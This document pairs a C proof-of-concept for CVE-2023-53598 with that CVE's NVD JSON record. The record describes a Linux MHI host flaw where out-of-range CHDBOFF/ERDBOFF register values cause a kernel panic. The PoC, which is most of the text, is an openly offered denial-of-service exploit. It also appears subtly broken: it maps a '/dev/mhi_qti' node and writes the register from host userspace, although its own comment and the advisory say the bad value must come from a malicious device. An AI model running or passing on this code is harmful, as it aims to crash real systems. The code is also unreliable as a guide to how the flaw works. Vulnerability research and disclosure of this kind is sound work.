CVE-2023-53598

/* * CVE-2023-53598 PoC - Trigger kernel panic via invalid CHDBOFF/ERDBOFF values * * This PoC demonstrates how a malicious MHI device can trigger a kernel panic * by providing out-of-range values in CHDBOFF or ERDBOFF registers. * * Note: This requires hardware-level access to manipulate MHI device registers, * typically via a PCIe device emulating MHI functionality. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/mman.h> #include <stdint.h> // MHI register offsets (simplified) #define MHI_CHDBOFF 0x18 #define MHI_ERDBOFF 0x1C // Invalid/out-of-range value that triggers the vulnerability #define INVALID_OFFSET 0xFFFFFFFF int main(int argc, char *argv[]) { int fd; volatile uint32_t *regs; // Open MHI device (e.g., /dev/mhi_device or via sysfs) fd = open("/dev/mhi_qti", O_RDWR); if (fd < 0) { perror("Failed to open MHI device"); return 1; } // Map device registers into user space regs = (volatile uint32_t *)mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); if (regs == MAP_FAILED) { perror("mmap failed"); close(fd); return 1; } // Write invalid CHDBOFF value to trigger out-of-range access // On vulnerable kernels, this will cause kernel panic printf("Writing invalid CHDBOFF value: 0x%X\n", INVALID_OFFSET); regs[MHI_CHDBOFF / 4] = INVALID_OFFSET; // Trigger MHI host initialization which reads the bad offset // This will cause the kernel to compute an invalid address // and panic when accessing it sleep(1); printf("Kernel should have panicked if vulnerable\n"); munmap((void *)regs, 4096); close(fd); return 0; }

{"cve": {"id": "CVE-2023-53598", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.383", "lastModified": "2026-03-21T00:55:41.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: mhi: host: Range check CHDBOFF and ERDBOFF\n\nIf the value read from the CHDBOFF and ERDBOFF registers is outside the\nrange of the MHI register space then an invalid address might be computed\nwhich later causes a kernel panic. Range check the read value to prevent\na crash due to bad data from the device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7", "versionEndExcluding": "5.10.192", "matchCriteriaId": "1CDFCD3A-0AA3-43ED-A57A-F15D2BD10149"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.112", "matchCriteriaId": "8612AB29-948C-4D53-84D9-6CA2E4A8B015"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2343385fe6eed11d0432ab42a97b3ca4aef06a99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/372f1752b74572b0a9d2288841eab7db17daccae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4e584127ec2bd42a37c88badb49df409f21fa40a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a0c637bfee69a74c104468544d9f2a6579626d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83bf6b87e2dd053d95d89eb2f01ae885f9e568db", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a2cbb1a45a0c86ce77839c0875414efe1a89315e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}